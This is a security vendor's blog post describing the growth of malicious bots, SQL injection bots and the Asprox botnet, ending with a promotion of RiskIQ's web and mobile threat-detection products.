Malicious bots present a unique challenge for cyber security organizations. The prevalence of these bad bots -- most commonly associated with DDoS attacks, click fraud, vulnerability testing, SPAM and malware distribution -- is steadily increasing.
In a recent article on Dark Reading, the author states that while the overall population of bots has shrunk 5% over 2013, the presence of bad bots is up 15%. There has also been a sharp rise in bad bots created at enterprise endpoints. The study showed that the amount of organizations found with bad bots inside their network jumped from 63% in 2012 to 73% in 2013.
In some cases, it was determined that certain bad bots were active for up to four months before any type of detection occurred. This is not that surprising when you factor in the amount of endpoints most enterprises have connecting to the Internet.
SQLi (SQL Injection) bots help malware authors inject malicious scripts into websites, which can lead to compromised infrastructure. This is a popular way to spread exploit kits capable of dropping Trojans, Spyware and Ransomware. The Asprox botnet was an early example of spreading SQL injection via botnets. Of course, Asprox has resurfaced recently in a slew of phishing campaigns targeting end users of major US retailers.
Bad bots are contributing to the spread of malware and other harmful web-based threats such as spam linking to malicious websites or doctored web pages designed to phish user data. The problem is enterprises and other online-based organizations rely on imperfect and vulnerable components to connect to the web and to end users. This creates software vulnerabilities that can be exploited and used to turn websites and mobile applications into tools for stealing user data.
Our area of expertise is digital asset security and digital brand security. This is a new area in information security technology and one that comes with unique technical challenges. Enterprise security teams face a difficult challenge when trying to use internal security tools to prevent their web properties from being compromised. This can lead to poor user experience and stolen data.
Many companies don't even maintain an inventory of branded digital assets that is up-to-date. This can be a result of shadow IT, lack of communication between developers and the security team, or third-party developers intentionally developing branded rogue assets (we observe branded rogues more in mobile). Because of this, many brands aren't in a position to swiftly respond if a website or mobile application has been hijacked and is spreading malware or phishing for private data.
RiskIQ's technology is designed to experience websites and mobile apps from the perspective of the end user. Major brands can leverage this new vantage point and the specialized products we offer to hunt down and remove dangerous, online, outward-facing threats. For further information on this, please review RiskIQ for Web and RiskIQ for Mobile